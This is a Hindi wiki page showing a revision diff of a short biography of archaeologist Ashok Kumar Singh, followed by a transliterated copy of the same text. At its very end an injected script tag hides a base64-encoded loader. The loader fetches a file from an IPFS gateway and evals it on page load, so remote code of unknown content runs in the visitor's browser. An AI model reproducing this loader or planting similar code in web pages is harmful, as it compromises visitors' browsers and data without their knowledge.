Difference between revisions of "अशोक कुमार सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "कालेज" to "कॉलेज")
m (Text replace - "पुरातत्व" to "पुरातत्त्व")
Line 3: Line 3:
 
==शिक्षा==
 
==शिक्षा==
 
'''प्रारंभिक शिक्षा-''' राष्ट्रीय इंटर कॉलेज, शेरपुर, मिर्जापुर।<br />
 
'''प्रारंभिक शिक्षा-''' राष्ट्रीय इंटर कॉलेज, शेरपुर, मिर्जापुर।<br />
'''उच्च शिक्षा-''' काशी हिंदू विश्वविद्यालय, स्नातक (1978), स्नातकोत्तर (1980), पी.एच.डी (1984)। एक वर्ष तक (1984-85) काशी विद्यापीठ, [[वाराणसी]] के नरेन्द्रदेव पुरातत्व-संग्रहालय विभाग, में अध्यापन।  
+
'''उच्च शिक्षा-''' काशी हिंदू विश्वविद्यालय, स्नातक (1978), स्नातकोत्तर (1980), पी.एच.डी (1984)। एक वर्ष तक (1984-85) काशी विद्यापीठ, [[वाराणसी]] के नरेन्द्रदेव पुरातत्त्व-संग्रहालय विभाग, में अध्यापन।  
 
==कार्यक्षेत्र==
 
==कार्यक्षेत्र==
 
* पिछले 20 वर्षो से कई पुरातात्विक स्थलों (इमलीडीह, वैना, भूड़ाडीह, अकथा और अगियाबीर) के उत्खनन का निर्देशन एवं सरयूपार एवं मध्य गंगा घाटी का विस्तृत सर्वेक्षण- कार्य। अनेक शोध- निबंध स्तरीय भारतीय एवं विदेशी शोध-पत्रिकाओं में प्रकाशित।   
 
* पिछले 20 वर्षो से कई पुरातात्विक स्थलों (इमलीडीह, वैना, भूड़ाडीह, अकथा और अगियाबीर) के उत्खनन का निर्देशन एवं सरयूपार एवं मध्य गंगा घाटी का विस्तृत सर्वेक्षण- कार्य। अनेक शोध- निबंध स्तरीय भारतीय एवं विदेशी शोध-पत्रिकाओं में प्रकाशित।   
 
* कई पुरातात्विक कमेटियों की आजीवन सदस्यता।  
 
* कई पुरातात्विक कमेटियों की आजीवन सदस्यता।  
 
* विदेशों एवं [[भारत]] में अनेक पुरातात्विक सम्मेलनों में सक्रिय सहभागिता।
 
* विदेशों एवं [[भारत]] में अनेक पुरातात्विक सम्मेलनों में सक्रिय सहभागिता।
* डॉ. अशोक कुमार सिंह वर्तमान में प्राचीन भारतीय [[इतिहास]], [[संस्कृति]] एवं पुरातत्व विभाग, [[काशी हिंदू विश्वविद्यालय]] में कार्यरत हैं।  
+
* डॉ. अशोक कुमार सिंह वर्तमान में प्राचीन भारतीय [[इतिहास]], [[संस्कृति]] एवं पुरातत्त्व विभाग, [[काशी हिंदू विश्वविद्यालय]] में कार्यरत हैं।  
  
  

Revision as of 06:41, 3 October 2011

thumb|ashok kumar sianh d aau. ashok kumar sianh ka janm 7 julaee, 1959 ko mirzapur (uttar pradesh) ke narayanapur gram mean hua tha.

shiksha

praranbhik shiksha- rashtriy iantar k aaulej, sherapur, mirjapur.
uchch shiksha- kashi hiandoo vishvavidyalay, snatak (1978), snatakottar (1980), pi.ech.di (1984). ek varsh tak (1984-85) kashi vidyapith, varanasi ke narendradev puratattv-sangrahalay vibhag, mean adhyapan.

karyakshetr

  • pichhale 20 varsho se kee puratatvik sthaloan (imalidih, vaina, bhoo dadih, akatha aur agiyabir) ke utkhanan ka nirdeshan evan sarayoopar evan madhy ganga ghati ka vistrit sarvekshan- kary. anek shodh- nibandh stariy bharatiy evan videshi shodh-patrikaoan mean prakashit.
  • kee puratatvik kametiyoan ki ajivan sadasyata.
  • videshoan evan bharat mean anek puratatvik sammelanoan mean sakriy sahabhagita.
  • d aau. ashok kumar sianh vartaman mean prachin bharatiy itihas, sanskriti evan puratattv vibhag, kashi hiandoo vishvavidyalay mean karyarat haian.



tika tippani aur sandarbh

sianh, ashok kumar uttar pradesh ke prachinatam nagar (hindi). bharatadiskavari pustakalay: vani prakashan, nee dilli.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>